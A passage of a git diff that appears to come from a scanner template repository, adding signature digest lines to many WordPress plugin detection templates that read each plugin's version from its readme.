4a0a00473045022100fe4d7a22bfa930cc84cf3e766d3d24b173cf9ddddec0e2909659ab7b9edac8170220428436f17b011cd10dde2133a64ee98ab25db91ec1198ff9e081e40a1cec7891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..977c645035 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f42a4cae6ddf40b5c8d65917db76e4a736afe8b4a5aaa4bd8cd70e04660e82b40220502b93dc5c68027663c8a3529cb4074ab0e7296354beda213a9ba553056eccd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..d81de075a1 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087f1678cdce7b228c96bc3fa1c81648cb1778f9d7e529fd4e3af9eabbcb80f56022100e21925e821ab239facc011f7be0a73ae79116a36a6393149d76d53b2678aaf5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..6c5ac3baf4 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022011b93e838a576f4d3d9beea54328017dd16c648cbe1ddfef8a05c597517f072b022100b1cefc60d6ccbd4614b41f2823da7842e4285c1ddb7cecaadbfc03d732f87e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..065258c95d 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068e59c0035d3c92eac3e53fb8bccd089e2ef8e409751d733b6aa9f493445179f022100bc52130b4aba52b9abbb507f6d3e38d206caa3ccde453b292b3086995e1f5e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..9293d01624 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aad2510bd151347032697d590682148f6658eb33922225cead84a0c15d1dbe6b02204a27be731170c7a3c1fbd71f672f9345022caaf8bb0a570ed88477f41ebe611c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..df886834ba 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004060c2f261be85351b8193a3a43fd42342b024bc89aa7e2009956b8022f4624022032df190f49c0657edb79e98c39f63ca750cae5dae460dfc35c8628f2610b3fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..92d0420bb3 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d82ad204ba61bb7164eeb5fa952765bf807868964de02e4a9ab7dc983e53bef022100ce9689aefce36b88f8e67d7c8c0aacf0863c7c68e2f4d7ecf2f2d5744b7ff2aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..54f28bcd0e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd0171e3e288ea767ed340ca8252d7f7c818ffcc658327b47557d4431cd519aa022100866ede0cb789962656f0df49e2ba1039061cdb86dfbf49cb32ce3c2dea8a81fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..aa6d437548 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbfeffe12d3f9b7ca85f90ed53ab0349cb98788ae33a7ccd359c0cabfa889937022016725322eed4c545d8ee64c33677227d98c42a634240c4672cd6166fd4e5a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..dd8717dcb2 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d2f89e74851e58ad68f44fbc00705839b30857b79a677ff8c7a9937a2c64f88022100aafb996dcdd048384f32c57de2f1a8235887ca8b33fc54ea68f9682073f200e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..f21e53228b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcf3db9cbeb1730a802e1802a57c54eafc4e2fba0cbd812190964a335a6fe7a00220468ef4049eae008d783b7b67dfbff39a669f58a9abc24aa2aa6db249b5109f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..9fd87c0432 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fecea6afbc40fd74001395896acf1b30b19f856d8ff9c0aba27d90eed6bbc8c5022100bf215c242a5e18bea1730661e86fee7d576fa150feebab75506ab63070e13e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..ae507559b3 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220314a4c8ecc934abb59e2eb470b3be784ae64fe7b6403f95130c4821a58cd3504022100e692853b3c1669ed8d42c712997a1466c04d7b1e646866569b2867c08547c3ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..0ece59bbbf 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e0dfb1128d1cda1207be0c50a778abc43ebe5e6c085581c43d50e76ca63da6c02203a3c4bbe9dc45f0bdae3f6fb18d8b0dfd70c8793fee098a06d30c6d9e9b69ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..90802a3766 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201513d0ee12dbb91822e10d3db8be7e387227f8a74514b942454d7263c0af067102202e7de7aee2ce00b92a97d62cc18371d473d88e62131d4c88d59e071a875104e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..a52f036977 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008aadaf04995cde392c0c04d8a98c22ddd393fbb9d2e8a23a7f8bdf9d9e37735c02203d0950232ab17b87e9513a5298435eb3075dfda62eacbd92e180a3eca7340bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..98c885ef99 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c1dd3fa78b85d538e1b5951ff23725442e0b63d779abeae89809ddccb55355502204280df661d93c01f1617cea9616e35791a8729bf4447c53fbf3a1bd2a85117d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..cbee734269 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e133684f432712e81c8570016efc2ad1fc2654b91aaafb25aaba244e134f17b002203c15cbaf49d1f0cdcb5a24de66cd7be429b7c87d23f8cc276970dff5e06368a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..6f4bcf2545 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220525904ddb0b069e2164b263ab6601ca85721f5469b28b022b87f2303e9f2e0ee022100888e35d8de626bf523638a6ed01b830aac3b88c4f746b96ef89a501ba97256cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..0df27ffced 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a762ee27dc941b7bb17a5d4a2ba520c5c9745a505cc658e0e1f0e8b8c98ee637022100f72e12f184fde733c4f8319e399d99e86824f318e09e8ddd33af22e63669fb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..7f805bc78a 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eee3ee1a4c6c4a3cf2a727f2724e7d91b3dd28d8b85b53effbb5d7a490016fb4022100ef30bd5f1d04f4c61449dc06fae53ed2b27b524f1b02ec96b7ef0714fafe3593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..c593ecd9da 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035e23b0fcb1eae118b330b06f27f922295127203d327787730576b4398b1181c02202219f15393df4092804e23ff98e3b312e80c21b947b44eb2c8fdbb7a3db08e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..d646b93171 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069d185e708d79f2539b188d366ec68f069ff6e6c8d5ff11e2a04616684d3e5a80220593e20f63e0793e09867a641413ad56b11b2f5d6d741040ffb73e359cba1af16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..2f6a30f258 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220490a32ba460eaeffc2c2b37be79a1b25376cba2fd18816c4d2c2317efde5f59102204d2b1c8633455a478c1952a05534088091e5240afad4cb7405afea0e23d0e13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..b8c9fce3be 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017371035f143b0d21f58a8521a5ac68a21c7d0e428f850db6c2945cce6224de402201f7d1ba518620b4817fb38ac790bbbd55180923a9c35de784021db5d3081b47c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..9f90c59028 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f77bb6cc0af4f7f1f3517efcd0a60007848147e6b23275783309180c15e4fec022038dcb32a271f20c5e6150edeff22bce776454a45fa962c272a0197277c1a2969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..d1c67879ae 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201cbb4ab1ecb6d7772754e15aacdc5f5ac93562c240b6df7d2ab7d0e1a64678700221008638722958a574199b188b58d737f920d0b325ac90c2bf9638f8725b422814b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..46162743a8 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202245e20826ceb1bc1861146581bcf03e0adb1db7e38204dc5ef2817ed06cf2e102207541942da845963a9f08245a025b2121354291deb1c602b6f3808ab261bcb757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..07947e29dd 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d37d9705c5e7a9f0b935cbdc2bafea0d5bfabd99fef4bf264fdbc3496f91f8720220319ccdc96c979eb145e36d9090e9f12a5957f9856b45c3d93a264371cbb1890a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..5bbab2b6b1 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7428bfa2e3519bbe94bf1dadea21b13d5093f051577b764f0a78c6cdfdc64bc022029632e972c84ed40b61bf9a22b083a68d0de72b9ae9130d6464cbcb232cf1b91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..9808639ccf 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204666dc86947420231526c0be85ed8cf94c957606d0b0ae1d41d99b1d7f8ced03022100eaa48f848689386b7bfa1ed8cb3abfbb81e48c3005581f795bcdc9dae1f80497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..9419c7289d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e64f356d8b4640ea1cccee85fb837660979b49118c86e3f1bf79e68a6d39479202200edfc794060a5af67e27caeac27cf56da4dae907b3e55857dee5a84440cbf3ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..bf1690615d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aedce5a99fed63f397b2ceebae837fa610706cb1abbf460cfa4cf2865ebe10ce02201f2c4fd063f65c9d968cb89e2449a5e4a6ab338b355194c8e743dc65e2eae1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..152399799c 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5cc7645ee5779d9c9baac100226bebcb0e0e3b46eb025f82d6bc33a6b132eba022100cc4710d8af997bb46c026d6b03dd99e54fdae08a13675aec1f00a1e8a9d99fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..fe6605ef79 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045028387d51452d9dd292f0cd89d3988a90b512581b0cb41687f6b6c63e1762202204768bb891142158bfc9694e2f89df4803548dcaf851839e94e11751404568af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..5562422c04 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220141b3c44c36dec18cd5cf8ff0923ffb4fd0a0ce1ef846441be825fa92ff0887c02206d33bf3312fa4f2a21ff04fb35d8adcff41f5f3b4ea85331683db03c70171cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..a4d3920093 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6d0c781dadc38999555235fe560eace14eed131d3a39a0086b367de14aef9da02206648d71b8b69d6ebd3c6ee46f67086951d0d4dab6ea60ec9932e2aba44add4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..33e2b97037 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000be16170ed47e29b8b7366b7cb1eac8bd10d1c7b87394712bf2c1d714236de002210094e56d61343fe454915065b8d3c11c859b0808b07e7aff9d181b2dd727749dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..2ee5ed0a10 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201813910139681312b8aca80f92c4a94c9b60c1409da31c74b3e256cc4e831518022100f8bcd4057019dbc4af581e4b94a739e8402eabde3c5bb683f2c46211a9349d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..7b7cde1ead 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008422069f96e979ba2445298b6e4d0fd7652953c80ffe82be1713fdd4512e26fa0220639c5c21f7c92a2c58392a1cac76c0d9070e72591cd5197d672c3674148f7a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..2b894e8260 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205755bab67c356c5c3b37a9a1ded30dd01f395bde3c6a0fc2a23061a42da2b081022100adb1ee4aa603f7a652c7e28dd9da2d459ec27cfc3204c90cf00f6b68008193fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..99b60c0d02 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004400237aa2306ef2d33235812b3d8211caeb87f4e4fffa1283ed828788cbf4f022100e6647e859243a8796f87487a31ead050d7881e03a4d3309c5a3e70135950e0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..d2d33e70a2 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8b8836654e1f904e8571679d41c4381d7db8f2187f414488f90178a4cb3ccba0220127874a8427042394c9ad32bf2f2378cef5a6323407b581ec4807fe8313380a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..747597fe24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206563f74fdc7289aa01f33e1e4e13d5b9b04fb9c354ba7ccca462f66583784e000221008a617378cffe449d7f34140cadac89ebe0576d362a7057476bab5f76d600f79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..0156b96c0a 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089a7cf594ac15b59203112e1079f7e5d79e734dd29b7bb4d64c73038ceafe9cf0220667227832e0c8ac451c07a99420662f9f7987a63221fdb586b3882eeae13aaa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..96dd740e48 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203335336ce82488c544e4a3526ed55285b78dec6140a374491b9d240c9d21560b022100bd9ff8844226c8dcc0b90d0380075d8c831783c5b5ac3ce919036023e29b6f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..9cce25fb38 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 